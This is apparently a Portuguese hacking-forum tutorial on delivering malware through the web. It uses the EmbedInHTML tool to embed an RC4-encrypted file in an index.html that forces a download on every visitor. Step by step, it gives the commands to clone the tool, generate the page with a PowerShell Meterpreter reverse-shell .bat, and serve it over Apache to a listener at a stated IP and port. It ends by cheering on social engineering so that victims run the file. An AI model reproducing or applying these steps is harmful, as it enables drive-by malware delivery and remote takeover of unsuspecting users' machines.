Metasploit – ENTREGA AUTOMÁTICA DE ARQUIVO MALICIOSO ENCRIPTADO VIA WEB

hoje apresento o EmbedInHtml, uma ferramenta escrita em Python que usa encriptação RC4 para incorporar um arquivo malicioso em uma index.html.
O index.html gerado deve ser colocado em um servidor web, e uma vez que esse servidor web seja acessado, automaticamente vai acontecer o download do arquivo malicioso no host que realizou o acesso.

Categorias: , , ,

Descrição

hoje apresento o EmbedInHtml, uma ferramenta escrita em Python que usa encriptação RC4 para incorporar um arquivo malicioso em uma index.html.
O index.html gerado deve ser colocado em um servidor web, e uma vez que esse servidor web seja acessado, automaticamente vai acontecer o download do arquivo malicioso no host que realizou o acesso.

Nesse tópico vou usar como meu arquivo malicioso, um payload meterpreter em powershell em um arquivo com extensão bat.(tr4kill3r.bat)
Observe que já tenho um serviço do msfconsole configurado no IP 141.255.156.143 e porta 1337 e já escutando.
OBS:(caso não saiba criar um arquivo malicioso e configurar o msfconsole para uma conexão reversa, leia este tópico viewtopic.php?f=35&t=196).

Image

Efetue o download da ferramenta, depois adicione permissão de execução ao conteúdo do diretório.

Code: Select all

git clone https://github.com/Arno0x/EmbedInHTML.git
chmod +x EmbedInHTML/*
cd EmbedInHTML/
Image

Para gerar o arquivo index.html com o arquivo malicioso incorporado, execute o script da seguinte forma.

Code: Select all

./embedInHTML.py -k Chave_para_encriptação_(vc escolhe) -f Seu_arquivo_malicioso -o index.html -m bat
Image

Feito isso, no diretório output/ foi gerado o estimado index.html tunado !
Sobre escreva o conteúdo do arquivo index.html da pasta /var/www/html com o conteúdo do arquivo index.html gerado na pasta output/.
Inicie o servidor apache para que o procedimento seja concluído.

Code: Select all

cd output/
cat index.html > /var/www/html/index.html
service apache2 start
Image

A partir de agora todo acesso no servidor web vai ganha de brinde um arquivo_malicioso.bat na pasta de download ! AUHSUASHUASH

Image

Underground pancadão… Caso você tenha sucesso na SUA engenharia social para fazer a vitima executar o arquivo que já está estregue, aquela linda sessão meterpreter vai brota na sua frente !

Image